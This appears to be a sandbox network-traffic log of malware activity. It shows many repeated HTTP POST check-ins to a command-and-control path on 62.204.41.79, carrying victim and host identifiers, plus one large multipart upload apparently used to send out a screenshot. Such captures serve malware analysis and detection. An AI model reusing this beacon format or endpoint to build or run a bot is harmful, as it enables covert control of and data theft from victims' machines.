Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE5Host: 62.204.41.79Content-Length: 105971Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
